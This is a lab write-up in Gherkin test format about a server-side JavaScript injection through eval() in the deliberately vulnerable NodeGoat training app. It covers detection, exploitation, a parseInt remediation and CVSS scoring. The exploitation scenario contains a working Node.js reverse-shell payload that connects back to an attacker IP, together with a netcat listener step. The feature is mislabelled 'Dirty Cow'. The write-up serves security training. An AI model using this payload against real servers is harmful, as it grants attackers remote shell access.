## Version 2.0
## language: en

Feature: Dirty Cow
  TOE:
    Node-goat
  Category:
    OS command injections
  Location:
    http://localhost:4000/contributions
  CWE:
    CWE-78: Improper Neutralization of Special Elements
    used in an OS Command ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Execute OS commands
  Recommendation:
    Always validate users inputs and cast values in the correct way

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 4.19.0      |
    | Netcat          | v1.10-41.1  |
    | Firefox         | 60.6.2      |
    | BurpSuite       | 1.7.36-56   |
  TOE information:
    Given The site "http://localhost:4000/contribution"
    When I enter into it
    Then The server is running on NodeJs "v8.10.0"

  Scenario: Normal use case
    Given The route "/contributions"
    When I type on one box in the "New Payroll Contribution Percent"
    Then I can change that value for the employees

  Scenario: Static detection
    Given The source code
    When I go to the "contributions.js" route handler
    Then I see that they are using the "eval()" function to cast the inputs
    """
    /*jslint evil: true */
    // Insecure use of eval() to parse inputs
    var preTax = eval(req.body.preTax);
    var afterTax = eval(req.body.afterTax);
    var roth = eval(req.body.roth);
    """
    When I insert Javascript code
    Then The code will be executed
    And I have command injection

  Scenario: Dynamic detection
    Given A text box
    When I enter a Javascript code to redirect me to Google
    """
    res.statusCode = 302;
    res.setHeader("Location", "http://google.com");
    res.end();
    """
    Then The code is executed
    And I am redirected to Google [evidence](image1.png)

  Scenario: Exploitation
    Given A command execution vulnerability
    When I search on Google how to create a NodeJs reverse shell
    Then I find a way to do it
    """
    var net = require("net"), sh = require("child_process").exec("/bin/bash");
    var client = new net.Socket();
    client.connect(1234, "192.168.0.103",
    function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
    sh.stderr.pipe(client);});
    """
    When I run a Netcat listener on my attacker machine
    Then I paste the command inside the textbox
    When I see an incoming connection on Netcat
    Then I have a reverse shell
    And It is of the user running the NodeJs server [evidence](image2.png)

  Scenario: Remediation
    Given The source code
    When I change the "eval()" function and parse the input with "parseInt()"
    """
    var preTax = parseInt(req.body.preTax);
    var afterTax = parseInt(req.body.afterTax);
    var roth = parseInt(req.body.roth);
    """
    Then It doesn't execute Javascript code
    And The vulnerability is patched [evidence](image3.png)

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.8/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.2/10 (High) - E:F/RL:O/RC:C/CR:H/IR:H/AR:H
    Environmental: Unique and relevant attributes to a specific user environment
      8.2/10 (High) - MAV:N/MAC:L/MPR:L/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-16
